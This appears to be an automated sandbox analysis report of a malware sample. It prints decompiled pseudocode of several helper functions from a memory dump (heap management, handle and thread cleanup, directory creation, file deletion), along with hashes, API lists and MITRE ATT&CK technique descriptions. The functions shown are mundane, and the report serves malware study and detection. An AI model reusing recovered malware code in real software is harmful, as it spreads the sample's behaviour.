				 *((intOrPtr*)(_t88 + 0x18)) = 1;
				 *(_t88 + 0x70) = 0;
				 *(_t88 + 0x74) = 0;
				 *(_t88 + 0x78) = 0;
				 *(_t88 + 0x7c) = 0;
				 *(_t88 + 0x80) = 0;
				 *(_t88 + 0x84) = 0;
				 *(_t88 + 0x88) = 0;
				 *(_t88 + 0x8c) = 0;
				memset(_t26, 0, 0x240);
				_t52 = _t88 + 0x83d2; // 0x83d2
				memset(_t52, 0, 0x40);
				return 0;
			}

0x00058294
0x000582aa
0x000582bc
0x000582c2
0x000582c9
0x000582cc
0x000582d4
0x000582ef
0x000582f8
0x000582ff
0x00058308
0x0005830e
0x0005830e
0x00058311
0x00058317
0x0005831e
0x00058321
0x00058327
0x0005832a
0x0005832a
0x00058335
0x00058338
0x0005833b
0x00058344
0x0005834b
0x00058352
0x00058359
0x00058360
0x00058367
0x0005836e
0x00058375
0x0005837c
0x00058383
0x0005838a
0x00058391
0x00058398
0x0005839f
0x000583a6
0x000583ad
0x000583b4
0x000583bb
0x000583c2
0x000583c9
0x000583d0
0x000583d7
0x000583e1
0x000583eb
0x000583f5
0x000583ff
0x00058407
0x00058410
0x0005841e

APIs

memset.NTDLL ref: 00058308
memset.NTDLL ref: 000583FF
memset.NTDLL ref: 00058410

Strings

VUUU, xrefs: 000582CF
VUUU, xrefs: 00058297

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: memset
String ID: VUUU$VUUU
API String ID: 2221118986-3149182767
Opcode ID: 169fe48bf51da982460801f18d59de5cff7197fbee27ad7251ebf50cc7d718c5
Instruction ID: 486cbd4149684b1c1be8ea02feb728d070f373098966ec56324a4507a11d8f1a
Opcode Fuzzy Hash: 169fe48bf51da982460801f18d59de5cff7197fbee27ad7251ebf50cc7d718c5
Instruction Fuzzy Hash: F441AAB1600A06BBE3088F65C569782FBE4FF44708F548219D6599BB80D7BAB168CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 000599A0, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00051830: GetProcessHeap.KERNEL32(00000008,00059F6B,00000000,00000000,00051004,?,000515F4,4DBAC13F,00059F6B,?,00000000), ref: 00051844
Part of subcall function 00051830: RtlAllocateHeap.NTDLL(00000000,?,000515F4), ref: 0005184B

_snwprintf.NTDLL ref: 000599E3
GetProcessHeap.KERNEL32(00000000,00058F37), ref: 00059A5E
HeapFree.KERNEL32(00000000), ref: 00059A65
GetProcessHeap.KERNEL32(00000000,?), ref: 00059A70
HeapFree.KERNEL32(00000000), ref: 00059A77

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate_snwprintf
String ID:
API String ID: 2579732983-0
Opcode ID: 7a58aaddd00685241b281673a3d8ea58cb262d884a0f2661182e7ae77b51453d
Instruction ID: 63b5a8e6a3e3249035c63c5d6328b9fa2c5b8106817e65dab93f68a2f43d4b8f
Opcode Fuzzy Hash: 7a58aaddd00685241b281673a3d8ea58cb262d884a0f2661182e7ae77b51453d
Instruction Fuzzy Hash: 1421FE71A40308FFFB109BE0AD4AFDB7B6DDB08702F100051FA05E51E1DAB56A588B65

Uniqueness

Uniqueness Score: -1.00%

Function 00058AA0, Relevance: 7.5, APIs: 5, Instructions: 49
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00058AA0() {
				int _t8;
				void* _t16;
				void* _t17;

				_t17 =  *0x5c274; // 0x0
				if(_t17 != 0) {
					do {
						_t8 =  *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0xb, 0);
						_t17 =  *_t17;
					} while (_t17 != 0);
					_t17 =  *0x5c274; // 0x0
				}
				_t16 = 0x5c274;
				while(_t17 != 0) {
					_t8 = WaitForSingleObject( *(_t17 + 0x10), 0xffffffff);
					if(_t8 == 0x102) {
						_t16 = _t17;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0, 0);
						VirtualFree( *(_t17 + 8), 0, 0x8000);
						CloseHandle( *(_t17 + 0x10));
						 *_t16 =  *_t17;
						_t8 = HeapFree(GetProcessHeap(), 0, _t17);
					}
					_t17 =  *_t16;
				}
				return _t8;
			}

0x00058aa1
0x00058aaa
0x00058ab0
0x00058aba
0x00058abc
0x00058abe
0x00058ac2
0x00058ac2
0x00058ac8
0x00058acf
0x00058ad6
0x00058ae1
0x00058b1e
0x00058ae3
0x00058aed
0x00058af9
0x00058b02
0x00058b0d
0x00058b16
0x00058b16
0x00058b20
0x00058b22
0x00058b28

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,00059315,00059286), ref: 00058AD6
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00058AF9
CloseHandle.KERNEL32(?), ref: 00058B02
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00058B0F
HeapFree.KERNEL32(00000000), ref: 00058B16

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: d2a9772e077f18335152778061dbd8de43af8efb81bb60459a8b6ffddaf62ad6
Instruction ID: 1987102fbb9ccc51aba3257a43bc254410f8357e509ecee2dd3c760a9651797f
Opcode Fuzzy Hash: d2a9772e077f18335152778061dbd8de43af8efb81bb60459a8b6ffddaf62ad6
Instruction Fuzzy Hash: F7015B36901B20AFFB314F54DC09F0777A4EF45B22F158A14FD92AB2A0CB34AC458B80

Uniqueness

Uniqueness Score: -1.00%

Function 000588B0, Relevance: 7.5, APIs: 5, Instructions: 40
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000588B0(long __ecx) {
				int _t6;
				long _t13;
				void* _t15;
				void* _t16;

				_t16 =  *0x5c274; // 0x0
				_t13 = __ecx;
				_t15 = 0x5c274;
				while(_t16 != 0) {
					_t6 = WaitForSingleObject( *(_t16 + 0x10), _t13);
					if(_t6 == 0x102) {
						_t15 = _t16;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t16 + 0xc))))( *(_t16 + 8), 0, 0);
						VirtualFree( *(_t16 + 8), 0, 0x8000);
						CloseHandle( *(_t16 + 0x10));
						 *_t15 =  *_t16;
						_t6 = HeapFree(GetProcessHeap(), 0, _t16);
					}
					_t16 =  *_t15;
				}
				return _t6;
			}

0x000588b2
0x000588b8
0x000588bb
0x000588c2
0x000588c8
0x000588d3
0x00058910
0x000588d5
0x000588df
0x000588eb
0x000588f4
0x000588ff
0x00058908
0x00058908
0x00058912
0x00058914
0x0005891b

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,000DBBA0,?,00058F3E), ref: 000588C8
VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,00058F3E), ref: 000588EB
CloseHandle.KERNEL32(?,?,000DBBA0,?,00058F3E), ref: 000588F4
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00058F3E), ref: 00058901
HeapFree.KERNEL32(00000000,?,000DBBA0,?,00058F3E), ref: 00058908

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: 7273f6c4158102ad6585667f4d8ea750b096e694df3ea69278a72695d7eaf68c
Instruction ID: 363a4a94be3ab4466f7fc0982ab6453a7c897dfdb4f26e3987ae453b05da8171
Opcode Fuzzy Hash: 7273f6c4158102ad6585667f4d8ea750b096e694df3ea69278a72695d7eaf68c
Instruction Fuzzy Hash: 37F08C31600B11AFFB200BA4DC49F27BBA9EF45712F244424FD82E72A1CB74AC44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00051E50, Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00051E50(void* __ecx, void** __edx, long* _a4) {
				long _v8;
				long _v12;
				long _v16;
				void** _v20;
				long _t36;
				void* _t42;
				long _t46;
				void* _t49;
				void* _t52;
				void* _t53;

				_push(0);
				_v20 = __edx;
				_push( &_v8);
				_v8 = 4;
				_t42 = __ecx;
				_push( &_v16);
				_push(0x20000005);
				_push( *((intOrPtr*)(__ecx + 8)));
				if( *0x5c238() == 0) {
					return 0;
				} else {
					_t49 = RtlAllocateHeap(GetProcessHeap(), 0, _v16);
					if(_t49 == 0) {
						return 0;
					} else {
						_v8 = 0;
						_v12 = 0;
						_t53 =  *0x5c248( *((intOrPtr*)(_t42 + 8)), _t49, _v16,  &_v12, _t52);
						if(_t53 == 0) {
							L7:
							HeapFree(GetProcessHeap(), 0, _t49);
							if(_t53 != 0) {
								goto L8;
							}
						} else {
							while(1) {
								_t36 = _v12;
								if(_t36 == 0) {
									break;
								}
								_t46 = _v8 + _t36;
								_v8 = _t46;
								_t53 =  *0x5c248( *((intOrPtr*)(_t42 + 8)), _t49 + _t46, _v16 - _t46,  &_v12);
								if(_t53 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L9;
							}
							if(_t53 != 0) {
								L8:
								 *_v20 = _t49;
								 *_a4 = _v8;
							} else {
								goto L7;
							}
						}
						L9:
						return _t53;
					}
				}
			}

0x00051e57
0x00051e5c
0x00051e5f
0x00051e63
0x00051e6a
0x00051e6c
0x00051e6d
0x00051e72
0x00051e7d
0x00051f30
0x00051e83
0x00051e96
0x00051e9a
0x00051f29
0x00051ea0
0x00051ea4
0x00051eaf
0x00051ec0
0x00051ec4
0x00051ef8
0x00051f02
0x00051f0a
0x00000000
0x00000000
0x00051ec6
0x00051ec6
0x00051ec6
0x00051ecb
0x00000000
0x00000000
0x00051ed0
0x00051edb
0x00051eec
0x00051ef0
0x00000000
0x00051ef2
0x00000000
0x00051ef2
0x00000000
0x00051ef0
0x00051ef6
0x00051f0c
0x00051f12
0x00051f17
0x00000000
0x00000000
0x00000000
0x00051ef6
0x00051f19
0x00051f21
0x00051f21
0x00051e9a

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,00058631), ref: 00051E89
RtlAllocateHeap.NTDLL(00000000), ref: 00051E90
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00051EFB
HeapFree.KERNEL32(00000000), ref: 00051F02

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 4d91fe0c506a927f19a00811a17a981dfbefe85c517efc10a21a85d27123857c
Instruction ID: c3015ef6565f654884c022eac60f0901be74e881037ce9c1bef66b6670865051
Opcode Fuzzy Hash: 4d91fe0c506a927f19a00811a17a981dfbefe85c517efc10a21a85d27123857c
Instruction Fuzzy Hash: 97212C76A01608AFEB11CF98DC48FAFBBB8EB49712F1401A5ED05E7250DB319E54DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00058420, Relevance: 6.1, APIs: 4, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00058420(intOrPtr __ecx, signed int __edx, long* _a4) {
				intOrPtr _v8;
				void* _t20;
				signed int _t28;
				signed int _t36;
				long _t44;
				void* _t45;

				_t36 = __edx;
				_t26 = _a4;
				_v8 = __ecx;
				_t28 = __edx * 0x6e;
				_t44 =  >  ? (0x51eb851f * _t28 >> 0x20 >> 5) - 0xffffff80 : ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) + 0x85 + __edx + ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) * 4;
				 *_a4 = _t44;
				_t20 = RtlAllocateHeap(GetProcessHeap(), 0, _t44);
				_t45 = _t20;
				if(_t45 == 0) {
					return _t20;
				} else {
					_push(_t28);
					if(E000529B0(_t45, _t26, _v8, _t36) == 0) {
						return _t45;
					}
					HeapFree(GetProcessHeap(), 0, _t45);
					return 0;
				}
			}

0x00058429
0x0005842b
0x00058433
0x00058438
0x00058460
0x00058466
0x0005846f
0x00058475
0x00058479
0x000584b1
0x0005847b
0x0005847b
0x0005848e
0x00000000
0x000584a9
0x0005849a
0x000584a8
0x000584a8

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 00058468
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0005846F

Part of subcall function 000529B0: memset.NTDLL ref: 000529C4

GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 00058493
HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 0005849A

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: e105830664695b900780772f00231a2a7cdb74ef8acd7b91b05f9eddb2dab77d
Instruction ID: 566febcda730be7e8633f52393ae7fa8ee4f20832fcf1f08d4718c0ce6067584
Opcode Fuzzy Hash: e105830664695b900780772f00231a2a7cdb74ef8acd7b91b05f9eddb2dab77d
Instruction Fuzzy Hash: 0001DB33F006246FE7145BA9AC09A5FBBA9DBC9662F414271FD0CE7385EA218C1486D1

Uniqueness

Uniqueness Score: -1.00%

Function 000518D0, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000518D0() {
				short _v524;
				signed int _t14;
				signed char _t16;
				void* _t21;
				void* _t22;

				memset( &_v524, 0, 0x208);
				if( *0x5c7c0 == 0) {
					L9:
					return 1;
				} else {
					_t21 = 0;
					do {
						_t2 = _t21 + 0x5c7c0; // 0x0
						_t14 =  *_t2 & 0x0000ffff;
						_t21 = _t21 + 2;
						 *(_t22 + _t21 - 0x20a) = _t14;
						if(_t14 != 0x5c) {
							goto L8;
						} else {
							_t16 = GetFileAttributesW( &_v524);
							if(_t16 != 0xffffffff) {
								if((_t16 & 0x00000010) == 0) {
									goto L6;
								} else {
									goto L8;
								}
							} else {
								if(CreateDirectoryW( &_v524, 0) != 0 || GetLastError() == 0xb7) {
									goto L8;
								} else {
									L6:
									return 0;
								}
							}
						}
						goto L10;
						L8:
					} while ( *(_t21 + 0x5c7c0) != 0);
					goto L9;
				}
				L10:
			}

0x000518e8
0x000518f9
0x0005195e
0x00051967
0x000518fb
0x000518fb
0x00051900
0x00051900
0x00051900
0x00051907
0x0005190a
0x00051915
0x00000000
0x00051917
0x0005191e
0x00051927
0x00051952
0x00000000
0x00000000
0x00000000
0x00000000
0x00051929
0x0005193a
0x00000000
0x00051949
0x00051949
0x0005194f
0x0005194f
0x0005193a
0x00051927
0x00000000
0x00051954
0x00051954
0x00000000
0x00051900
0x00000000

APIs

memset.NTDLL ref: 000518E8
GetFileAttributesW.KERNEL32(?), ref: 0005191E
CreateDirectoryW.KERNEL32(?,00000000), ref: 00051932
GetLastError.KERNEL32 ref: 0005193C

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryErrorFileLastmemset
String ID:
API String ID: 528582180-0
Opcode ID: 976f1a766fc4900fd9df675191f1f94f0f3d432bfc24ea3e97d659d14c3d0c0a
Instruction ID: 22240d0333423cb42c5beaf1bb542f6255629e119aa70dcf4fb1b02e5ca1e72b
Opcode Fuzzy Hash: 976f1a766fc4900fd9df675191f1f94f0f3d432bfc24ea3e97d659d14c3d0c0a
Instruction Fuzzy Hash: F001B5319003195AFBB09B64AC0CBE777A8EF05716F000655ED69E30D1EB74AD88CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 00058B30, Relevance: 6.0, APIs: 4, Instructions: 46
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00058B30(WCHAR* _a4, intOrPtr* _a8) {
				intOrPtr* _t14;
				intOrPtr* _t19;
				intOrPtr _t24;
				WCHAR* _t25;
				intOrPtr* _t26;

				_t25 = _a4;
				_t10 = _t25 + 0x24;
				_a4 = _t25 + 0x24;
				_t24 = E000519E0(_t10);
				if( *((intOrPtr*)(_t25 + 0x18)) == GetCurrentProcessId()) {
					L8:
					return 1;
				}
				_t19 = _a8;
				_t14 =  *_t19;
				if(_t14 == 0) {
					L5:
					_t26 = RtlAllocateHeap(GetProcessHeap(), 8, 0x210);
					if(_t26 != 0) {
						_t8 = _t26 + 4; // 0x4
						lstrcpyW(_t8, _a4);
						 *((intOrPtr*)(_t26 + 0x20c)) = _t24;
						 *_t26 =  *_t19;
						 *_t19 = _t26;
					}
					L7:
					goto L8;
				}
				while( *((intOrPtr*)(_t14 + 0x20c)) != _t24) {
					_t14 =  *_t14;
					if(_t14 != 0) {
						continue;
					}
					goto L5;
				}
				goto L7;
			}

0x00058b34
0x00058b38
0x00058b3d
0x00058b45
0x00058b50
0x00058ba3
0x00058baa
0x00058baa
0x00058b53
0x00058b56
0x00058b5a
0x00058b6e
0x00058b82
0x00058b86
0x00058b8b
0x00058b8f
0x00058b95
0x00058b9d
0x00058b9f
0x00058b9f
0x00058ba1
0x00000000
0x00058ba1
0x00058b60
0x00058b68
0x00058b6c
0x00000000
0x00000000
0x00000000
0x00058b6c
0x00000000

APIs

GetCurrentProcessId.KERNEL32(00000000,00000000,?,0005215D,0000022C,00000000,?,?), ref: 00058B47
GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,0005215D,0000022C,00000000,?,?), ref: 00058B75
RtlAllocateHeap.NTDLL(00000000,?,0005215D), ref: 00058B7C
lstrcpyW.KERNEL32(00000004,?), ref: 00058B8F

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: HeapProcess$AllocateCurrentlstrcpy
String ID:
API String ID: 2952365268-0
Opcode ID: 16750aa085a3eb542f3ad712835270817bce58fbd0ac60518efbed764f78f12f
Instruction ID: aaabdc0104fb1e44bf94dc639a11a3bead01f9a84eaaeeb9b627957f0e5a5b6e
Opcode Fuzzy Hash: 16750aa085a3eb542f3ad712835270817bce58fbd0ac60518efbed764f78f12f
Instruction Fuzzy Hash: 5D018C716007049FEB609F69D888A87B7E8FF45742B148529FD46E7251DB34E844CB90

Uniqueness

Uniqueness Score: -1.00%

Function 000584C0, Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000584C0(intOrPtr __ecx, void* __edx, long* _a4) {
				intOrPtr _v8;
				void* _t5;
				void* _t11;
				void* _t17;

				_t16 = _a4;
				_t11 = __edx;
				_v8 = __ecx;
				_t5 = RtlAllocateHeap(GetProcessHeap(), 0,  *_a4);
				_t17 = _t5;
				if(_t17 == 0) {
					return _t5;
				} else {
					if(E00052D80(_t17, _t16, _v8, _t11) == 0) {
						return _t17;
					}
					HeapFree(GetProcessHeap(), 0, _t17);
					return 0;
				}
			}

0x000584c9
0x000584cc
0x000584ce
0x000584dc
0x000584e2
0x000584e6
0x0005851d
0x000584e8
0x000584fa
0x00000000
0x00058515
0x00058506
0x00058514
0x00058514

APIs

GetProcessHeap.KERNEL32(00000000,00058668,?,?,?,00058668,?), ref: 000584D5
RtlAllocateHeap.NTDLL(00000000), ref: 000584DC

Part of subcall function 00052D80: memset.NTDLL ref: 00052D94

GetProcessHeap.KERNEL32(00000000,00000000), ref: 000584FF
HeapFree.KERNEL32(00000000), ref: 00058506

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: 122ce123a5d7c0f1cc2c01921ecb3707aecf9111857ffe20d0848f43e1786869
Instruction ID: da0760c55c709e1450dc4abf66871fb27b327e5aadceaf08907a2f719c0d8524
Opcode Fuzzy Hash: 122ce123a5d7c0f1cc2c01921ecb3707aecf9111857ffe20d0848f43e1786869
Instruction Fuzzy Hash: DDF09032B017146FFB105BA9AC0DA9FFBACDF89663F040062FD08D2211EA319D1486E1

Uniqueness

Uniqueness Score: -1.00%

Function 0005A750, Relevance: 6.0, APIs: 4, Instructions: 31
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0005A750(long __ecx) {
				int _t3;
				long _t7;
				void* _t9;
				void* _t10;

				_t10 =  *0x5cbd4; // 0x0
				_t7 = __ecx;
				_t9 = 0x5cbd4;
				while(_t10 != 0) {
					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
					if(_t3 == 0x102) {
						_t9 = _t10;
					} else {
						 *_t9 =  *_t10;
						CloseHandle( *(_t10 + 8));
						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
					}
					_t10 =  *_t9;
				}
				return _t3;
			}

0x0005a752
0x0005a758
0x0005a75b
0x0005a762
0x0005a768
0x0005a773
0x0005a794
0x0005a775
0x0005a777
0x0005a77c
0x0005a78c
0x0005a78c
0x0005a796
0x0005a798
0x0005a79f

APIs

WaitForSingleObject.KERNEL32(?,?,00000000,00059315,00000000,0005928E), ref: 0005A768
CloseHandle.KERNEL32(?,?,00000000,00059315,00000000,0005928E), ref: 0005A77C
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00059315,00000000,0005928E), ref: 0005A785
HeapFree.KERNEL32(00000000,?,00000000,00059315,00000000,0005928E), ref: 0005A78C

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$CloseFreeHandleObjectProcessSingleWait
String ID:
API String ID: 1931067520-0
Opcode ID: 30951f24d55e624aa2ef60382baa0cd3bd4c04f38359a9256367b15e13de6af1
Instruction ID: 4ef0a43bdefe4b285acc9bb9f7f20913ee95d2ff1ebbbc26c948a48939c335f1
Opcode Fuzzy Hash: 30951f24d55e624aa2ef60382baa0cd3bd4c04f38359a9256367b15e13de6af1
Instruction Fuzzy Hash: 2BF0E536605720AFFB211B58DC48E277BB9EF4A723B140515FD42D7221C7789C40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00051970, Relevance: 6.0, APIs: 4, Instructions: 31
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00051970() {
				void* _v8;
				short _v528;
				void* _t15;

				E00051830(0x51010, 0x14, 0x41ce18c7,  &_v8);
				_t15 = _v8;
				 *0x5c200( &_v528, 0x104, _t15, 0x5c7c0, _t15);
				HeapFree(GetProcessHeap(), 0, _t15);
				return DeleteFileW( &_v528);
			}

0x0005198d
0x00051992
0x000519a8
0x000519bb
0x000519d2

APIs

Part of subcall function 00051830: GetProcessHeap.KERNEL32(00000008,00059F6B,00000000,00000000,00051004,?,000515F4,4DBAC13F,00059F6B,?,00000000), ref: 00051844
Part of subcall function 00051830: RtlAllocateHeap.NTDLL(00000000,?,000515F4), ref: 0005184B

_snwprintf.NTDLL ref: 000519A8
GetProcessHeap.KERNEL32(00000000,00059730), ref: 000519B4
HeapFree.KERNEL32(00000000), ref: 000519BB
DeleteFileW.KERNEL32(?), ref: 000519C8

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateDeleteFileFree_snwprintf
String ID:
API String ID: 135842935-0
Opcode ID: 32d08c6c0cdf32f74d1ce538d3f18d9dc384e17a12808b1c1cd1910ab1df2a46
Instruction ID: 8eb12e45f2214c7a35fabf9c3bd6b226e7608a53ad1e7ddba06f191dadebede9
Opcode Fuzzy Hash: 32d08c6c0cdf32f74d1ce538d3f18d9dc384e17a12808b1c1cd1910ab1df2a46
Instruction Fuzzy Hash: B7F082B1901318BBFB10A7A49C0DFDB7F6CDB05316F000091BA09E2143DA785A04CBE1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

